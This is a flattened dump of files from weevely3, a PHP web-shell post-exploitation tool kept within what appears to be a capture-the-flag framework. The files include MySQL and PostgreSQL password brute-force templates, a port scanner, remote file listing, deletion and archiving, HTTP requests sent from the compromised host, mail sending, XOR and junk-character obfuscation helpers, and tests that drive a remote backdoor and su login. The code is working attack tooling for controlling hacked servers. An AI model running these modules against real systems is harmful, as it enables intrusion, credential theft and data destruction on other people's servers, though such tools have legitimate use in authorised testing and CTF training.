https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/modules/backdoor/_reversetcp/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/modules/bruteforce/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/modules/bruteforce/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/modules/bruteforce/_sql/mysql.tpl: -------------------------------------------------------------------------------- 1 | <%! import json %> 2 | 3 | ini_set('mysql.connect_timeout',1); 4 | $users=array ( 5 | % for u in users: 6 | ${ json.dumps(u) }, 7 | % endfor 8 | ); 9 | $pwds=array ( 10 | % for p in pwds: 11 | ${ json.dumps(p) }, 12 | % endfor 13 | ); 14 | 15 | foreach($users as $u) { 16 | foreach($pwds as $p) { 17 | $c=@mysql_connect("${ hostname }", "$u", "$p"); 18 | if($c){ 19 | print("$u:$p".PHP_EOL); 20 | break; 21 | } 22 | } 23 | }mysql_close(); 24 | -------------------------------------------------------------------------------- /utils/weevely3/modules/bruteforce/_sql/pgsql.tpl: -------------------------------------------------------------------------------- 1 | <%! import json %> 2 | 3 | $users=array ( 4 | % for u in users: 5 | ${ json.dumps(u) }, 6 | % endfor 7 | ); 8 | $pwds=array ( 9 | % for p in pwds: 10 | ${ json.dumps(p) }, 11 | % endfor 12 | ); 13 | 14 | foreach($users as $u) { 15 | foreach($pwds as $p) { 16 | $c=@pg_connect("host=${ hostname } user=$u password=$p connect_timeout=1"); 17 | if($c){ 18 | print("$u:$p".PHP_EOL); 19 | break; 20 | } 21 | } 22 | }pg_close(); 23 | -------------------------------------------------------------------------------- /utils/weevely3/modules/file/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/modules/file/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/modules/file/_tar/php_tar.tpl: -------------------------------------------------------------------------------- 1 | <%include file="EasyTar.class.php"/> 2 | 3 | $f='set_time_limit'&&is_callable($f)&&$f(0); 4 | $f='ini_set'&&is_callable($f)&&$f('max_execution_time', 0); 5 | $a = new tar; 6 | 7 | $z = '${ rtar }'; 8 | 9 | $fs=array ( 10 | % for f in rfiles: 11 | '${ f }', 12 | % endfor 13 | ); 14 | 15 | ## Here decompress 16 | % if decompress: 17 | 18 | if(!file_exists($z) || !is_readable($z)) { 19 | print("Skipping file '$z', check existance and permission"); 20 | } 21 | else { 22 | $a->extractTar($z, '${ rfiles[0] if rfiles and rfiles[0] else '.' }'); 23 | } 24 | 25 | ## Here compress 26 | % else: 27 | 28 | if(file_exists($z)) { 29 | print("File '$z' already exists, skipping compressing"); 30 | } 31 | else { 32 | $a->makeTar($fs, $z); 33 | } 34 | 35 | ## Since makeTar does not complain for missing $z, just double 36 | ## check the existance of the zipped file and print generic error message 37 | if(!file_exists($z)) { 38 | print("File '$z' not created, check existance and permission"); 39 | } 40 | 41 | % endif 42 | -------------------------------------------------------------------------------- /utils/weevely3/modules/file/_zip/php_zip.tpl: -------------------------------------------------------------------------------- 1 | <%include file="EasyZip.class.php"/> 2 | 3 | $f='set_time_limit'&&is_callable($f)&&$f(0); 4 | $f='ini_set'&&is_callable($f)&&$f('max_execution_time', 0); 5 | $a = new zip; 6 | 7 | $z = '${ rzip }'; 8 | 9 | $fs=array ( 10 | % for f in rfiles: 11 | '${ f }', 12 | % endfor 13 | ); 14 | 15 | ## Here decompress 16 | % if decompress: 17 | 18 | if(!file_exists($z) || !is_readable($z)) { 19 | print("Skipping file '$z', check existance and permission"); 20 | } 21 | else { 22 | $a->extractZip($z, '${ rfiles[0] if rfiles and rfiles[0] else '.' }'); 23 | } 24 | 25 | ## Here compress 26 | % else: 27 | 28 | if(file_exists($z)) { 29 | print("File '$z' already exists, skipping compressing"); 30 | } 31 | else { 32 | $a->makeZip($fs, $z); 33 | } 34 | 35 | ## Since makeZip does not complain for missing $z, just double 36 | ## check the existance of the zipped file and print generic error message 37 | if(!file_exists($z)) { 38 | print("File '$z' not created, check existance and permission"); 39 | } 40 | 41 | % endif 42 | -------------------------------------------------------------------------------- /utils/weevely3/modules/file/ls.py: -------------------------------------------------------------------------------- 1 | from core.vectors import PhpCode 2 | from core.module import Module 3 | from core.loggers import log 4 | from core import messages 5 | import random 6 | 7 | 8 | class Ls(Module): 9 | 10 | """List directory content.""" 11 | 12 | aliases = [ 'ls', 'dir' ] 13 | 14 | def init(self): 15 | 16 | self.register_info( 17 | { 18 | 'author': [ 19 | 'Emilio Pinna' 20 | ], 21 | 'license': 'GPLv3' 22 | } 23 | ) 24 | 25 | self.register_arguments([ 26 | { 'name' : 'dir', 'help' : 'Target folder', 'nargs' : '?', 'default' : '.' } 27 | ]) 28 | 29 | def run(self): 30 | 31 | return PhpCode(""" 32 | $p="${dir}"; 33 | if(@is_dir($p)){ 34 | $d=@opendir($p); 35 | $a=array(); 36 | if($d){ 37 | while(($f=@readdir($d))) $a[]=$f; 38 | sort($a); 39 | print(join(PHP_EOL,$a)); 40 | } 41 | }""", 42 | postprocess = lambda x: x.split('\n') 43 | ).run(self.args) 44 | 45 | def print_result(self, result): 46 | if result: log.info('\n'.join(result)) 47 | -------------------------------------------------------------------------------- /utils/weevely3/modules/file/rm.py: -------------------------------------------------------------------------------- 1 | from core.vectors import PhpCode, ShellCmd, ModuleExec, Os 2 | from core.module import Module 3 | from core import modules 4 | 5 | class Rm(Module): 6 | 7 | """Remove remote file.""" 8 | 9 | aliases = [ 'rm' ] 10 | 11 | def init(self): 12 | 13 | self.register_info( 14 | { 15 | 'author': [ 16 | 'Emilio Pinna' 17 | ], 18 | 'license': 'GPLv3' 19 | } 20 | ) 21 | 22 | self.register_arguments([ 23 | { 'name' : 'rpath', 'help' : 'Remote file path' } 24 | ]) 25 | 26 | def run(self): 27 | 28 | # Run unlink 29 | return PhpCode("""(unlink('${rpath}') && print(1)) || print(0);""", 30 | postprocess = lambda x: True if x == '1' else False 31 | ).run(self.args) 32 | -------------------------------------------------------------------------------- /utils/weevely3/modules/net/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/modules/net/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/modules/net/_curl/php_curl.tpl: -------------------------------------------------------------------------------- 1 | $ch = curl_init(); 2 | 3 | curl_setopt($ch, CURLOPT_URL, '${url}'); 4 | 5 | curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "${ request if not data else 'POST' }"); 6 | curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, ${ connect_timeout }); 7 | 8 | % if header or cookie or user_agent or data: 9 | curl_setopt($ch, CURLOPT_HTTPHEADER, array( 10 | % endif 11 | % for h in header: 12 | % if not (data and (h.title().startswith('Content-Type: ') or h.title().startswith('Content-Length: '))) and not (user_agent and h.title().startswith('User-Agent: ')): 13 | '${h}', 14 | % endif 15 | % endfor 16 | % if cookie: 17 | 'Cookie: ${ cookie }', 18 | % endif 19 | % if user_agent: 20 | "User-Agent: ${ user_agent }", 21 | % endif 22 | % if data: 23 | 'Content-Type: application/x-www-form-urlencoded', 24 | 'Content-Length: ${ len(''.join(data)) }', 25 | % endif 26 | % if header or cookie or user_agent or data: 27 | )); 28 | % endif 29 | 30 | % if data: 31 | curl_setopt($ch, CURLOPT_POST, 1); 32 | curl_setopt($ch, CURLOPT_POSTFIELDS, '${ ''.join(data) }'); 33 | % endif 34 | 35 | curl_setopt($ch, CURLOPT_HEADER, 1); 36 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 37 | $response = curl_exec($ch); 38 | print($response); 39 | -------------------------------------------------------------------------------- /utils/weevely3/modules/net/_curl/php_httprequest1.tpl: -------------------------------------------------------------------------------- 1 | if(class_exists('HttpRequest')) { 2 | $r = new HttpRequest('${ url }', HttpRequest::METH_${ request if not data else 'POST' }); 3 | 4 | $r->setOptions(array('connecttimeout'=>${ connect_timeout })); 5 | 6 | % if header or cookie or user_agent or data: 7 | $r->addHeaders( 8 | array( 9 | % for h in header: 10 | % if not (data and (h.title().startswith('Content-Type: ') or h.title().startswith('Content-Length: '))) and not (user_agent and h.title().startswith('User-Agent: ')): 11 | '${ h.split(':')[0] }' => '${ h.split(':')[1].lstrip() }', 12 | % endif 13 | % endfor 14 | % if user_agent: 15 | 'User-Agent'=>'${ user_agent }', 16 | % endif 17 | % if cookie: 18 | 'Cookie'=>'${ cookie }', 19 | % endif 20 | ) 21 | ); 22 | % endif 23 | 24 | % if data: 25 | $r->addRawPostData('${ ''.join(data) }'); 26 | % endif 27 | 28 | try { 29 | $r = $r->send(); 30 | } catch (HttpException $ex) { } 31 | 32 | print("HTTP/" . $r->getHttpVersion() . " " . $r->getResponseCode() . " " . $r->getResponseStatus() . "\r\n"); 33 | 34 | foreach($r->getHeaders() as $h => $v) { 35 | print("$h: $v\r\n"); 36 | } 37 | print("\r\n" . $r->getBody()); 38 | } 39 | -------------------------------------------------------------------------------- /utils/weevely3/modules/net/_scan/fsockopen.tpl: -------------------------------------------------------------------------------- 1 | $addrs = array( "${ '", "'.join( ips ) }" ); 2 | $ports = array( ${ ', '.join( [ str(p) for p in prts ] ) } ); 3 | 4 | foreach($addrs as $a) { 5 | foreach($ports as $p) { 6 | $n="";$e=""; 7 | if($fp = fsockopen($a, $p, $n, $e, $timeout=${ timeout })) { 8 | print("OPN $a:$p" . PHP_EOL); 9 | fclose($fp); 10 | } 11 | else { 12 | print("ERR $a:$p $e $n" . PHP_EOL); 13 | } 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /utils/weevely3/modules/net/mail.py: -------------------------------------------------------------------------------- 1 | from core.vectors import PhpCode, ShellCmd, ModuleExec, Os 2 | from core.module import Module 3 | from core import modules 4 | 5 | class Mail(Module): 6 | 7 | """Send mail.""" 8 | 9 | aliases = [ 'mail' ] 10 | 11 | def init(self): 12 | 13 | self.register_info( 14 | { 15 | 'author': [ 16 | 'appo' 17 | ], 18 | 'license': 'GPLv3' 19 | } 20 | ) 21 | 22 | self.register_arguments([ 23 | { 'name' : 'to', 'help' : 'Receiver, or receivers of the mail' }, 24 | { 'name' : 'subject', 'help' : 'Subject of the mail to be sent. ' }, 25 | { 'name' : 'message', 'help' : 'Message to be sent. ( Write message in " " ) ' }, 26 | { 'name' : 'sender', 'help' : 'Set sender of the mail. ' } 27 | ]) 28 | 29 | def run(self): 30 | 31 | return PhpCode("""(mail('${to}', '${subject}', '${message}', 'From: ${sender}') && print(1)) || print(0);""", 32 | postprocess = lambda x: True if x == '1' else False 33 | ).run(self.args) 34 | -------------------------------------------------------------------------------- /utils/weevely3/modules/shell/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/modules/shell/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/modules/sql/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/modules/sql/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/modules/system/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/modules/system/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/requirements.txt: -------------------------------------------------------------------------------- 1 | prettytable 2 | Mako 3 | PyYAML 4 | python-dateutil 5 | PySocks 6 | 7 | -------------------------------------------------------------------------------- /utils/weevely3/testsuite/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/testsuite/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/testsuite/test_shell_php.py: -------------------------------------------------------------------------------- 1 | from testsuite.base_test import BaseTest 2 | from testfixtures import log_capture 3 | from core import modules 4 | from core.sessions import SessionURL 5 | from core import messages 6 | import logging 7 | import os 8 | 9 | class ShellPHP(BaseTest): 10 | 11 | def setUp(self): 12 | session = SessionURL(self.url, self.password, volatile = True) 13 | modules.load_modules(session) 14 | 15 | self.run_argv = modules.loaded['shell_php'].run_argv 16 | 17 | @log_capture() 18 | def test_commands(self, log_captured): 19 | self.assertEqual(self.run_argv(["echo(1);"]),"1"); 20 | 21 | # In case of some error in the remote PHP execution, 22 | # both 500 or 200 OK could be returned. In any case 23 | # this should warn about the missing PHP comma. 24 | 25 | self.assertEqual(self.run_argv(["echo(1)"]),""); 26 | self.assertRegexpMatches(log_captured.records[-1].msg, 27 | messages.module_shell_php.missing_php_trailer_s % ".*echo\(1\)") 28 | 29 | # Check warnings on 404. 30 | 31 | self.assertEqual(self.run_argv(["header('HTTP/1.0 404 Not Found');"]),""); 32 | self.assertEqual(messages.module_shell_php.error_404_remote_backdoor, 33 | log_captured.records[-1].msg) 34 | -------------------------------------------------------------------------------- /utils/weevely3/testsuite/test_shell_su.py: -------------------------------------------------------------------------------- 1 | from testsuite.base_test import BaseTest 2 | from core.weexceptions import ArgparseError 3 | from core.vectors import PhpCode 4 | from core.vectors import Os 5 | from core import modules 6 | from core.sessions import SessionURL 7 | from core import messages 8 | from testsuite.config import su_user, su_passwd 9 | import core.config 10 | import unittest 11 | import logging 12 | import os 13 | 14 | @unittest.skipIf( 15 | not su_user or not su_passwd, 16 | "Skip su shell tests") 17 | class ShellSu(BaseTest): 18 | 19 | def setUp(self): 20 | self.session = SessionURL(self.url, self.password, volatile = True) 21 | modules.load_modules(self.session) 22 | 23 | self.vector_list = modules.loaded['shell_su'].vectors.get_names() 24 | 25 | self.run_argv = modules.loaded['shell_su'].run_argv 26 | 27 | 28 | def test_param_vector(self): 29 | 30 | for vect in self.vector_list: 31 | # Check correctness of execution 32 | self.assertEqual(self.run_argv(["-vector", vect, "-u", su_user, su_passwd, "whoami"]).rstrip(), su_user); 33 | -------------------------------------------------------------------------------- /utils/weevely3/testsuite/test_system_info.py: -------------------------------------------------------------------------------- 1 | from testsuite.base_test import BaseTest 2 | from testfixtures import log_capture 3 | from core.weexceptions import ArgparseError 4 | from core import modules 5 | from core.sessions import SessionURL 6 | from core import messages 7 | import logging 8 | import os 9 | 10 | class SystemInfo(BaseTest): 11 | 12 | def setUp(self): 13 | session = SessionURL(self.url, self.password, volatile = True) 14 | modules.load_modules(session) 15 | 16 | self.run_argv = modules.loaded['system_info'].run_argv 17 | 18 | @log_capture() 19 | def test_commands(self, log_captured): 20 | 21 | # Get all infos, returns a dict 22 | vectors_names = [v.name for v in modules.loaded['system_info'].vectors ] 23 | self.assertEqual(set(self.run_argv([]).keys()), set(vectors_names)); 24 | 25 | # Get just one info, returns a string 26 | self.assertEqual( 27 | os.path.split(self.run_argv(["-info", "script"]))[1], 28 | os.path.split(self.path)[1] 29 | ); 30 | 31 | # Pass unexistant info 32 | self.assertRaises(ArgparseError, self.run_argv, ["-info", "BOGUS"]); 33 | -------------------------------------------------------------------------------- /utils/weevely3/utils/__init__.py: -------------------------------------------------------------------------------- 1 | # Importing stuff in __init__.py allows importing direct submodule import 2 | import http 3 | import strings 4 | import prettify 5 | import iputil 6 | import code 7 | -------------------------------------------------------------------------------- /utils/weevely3/utils/iputil.py: -------------------------------------------------------------------------------- 1 | import itertools 2 | 3 | # Explode IP format 10.10.10.10-233 4 | def ip_range(input_string): 5 | octets = input_string.split('.') 6 | chunks = [map(int, octet.split('-')) for octet in octets] 7 | ranges = [range(c[0], c[1] + 1) if len(c) == 2 else c for c in chunks] 8 | 9 | for address in itertools.product(*ranges): 10 | yield '.'.join(map(str, address)) 11 | 12 | # Explode port format 22,23-33 13 | def port_range(input_string): 14 | return sum( 15 | ( 16 | ( 17 | list(range(*[int(j) + k for k,j in enumerate(i.split('-'))])) 18 | if '-' in i else [int(i)] 19 | ) 20 | for i in input_string.split(',') 21 | ), [] 22 | ) 23 | -------------------------------------------------------------------------------- /utils/weevely3/utils/strings.py: -------------------------------------------------------------------------------- 1 | import random 2 | import string 3 | import itertools 4 | 5 | def randstr(n=4, fixed=True, charset=None): 6 | 7 | if not n: 8 | return '' 9 | 10 | if not fixed: 11 | n = random.randint(1, n) 12 | 13 | if not charset: 14 | charset = string.letters + string.digits 15 | 16 | return ''.join(random.choice(charset) for x in range(n)) 17 | 18 | def divide(data, min_size, max_size, split_size): 19 | it = iter(data) 20 | size = len(data) 21 | for i in range(split_size - 1, 0, -1): 22 | s = random.randint(min_size, size - max_size * i) 23 | yield ''.join(itertools.islice(it, 0, s)) 24 | size -= s 25 | yield ''.join(it) 26 | 27 | def sxor(s1, s2): 28 | return ''.join( 29 | chr(ord(a) ^ ord(b)) 30 | for a, b in zip(s1, itertools.cycle(s2)) 31 | ) 32 | 33 | def pollute(data, charset, frequency=0.3): 34 | 35 | str_encoded = '' 36 | for char in data: 37 | if random.random() < frequency: 38 | str_encoded += randstr(1, True, charset) + char 39 | else: 40 | str_encoded += char 41 | 42 | return str_encoded 43 | 44 | def chunks(l, n): 45 | """ Yield successive n-sized chunks from l. 46 | """ 47 | for i in xrange(0, len(l), n): 48 | yield l[i:i+n] 49 | --------------------------------------------------------------------------------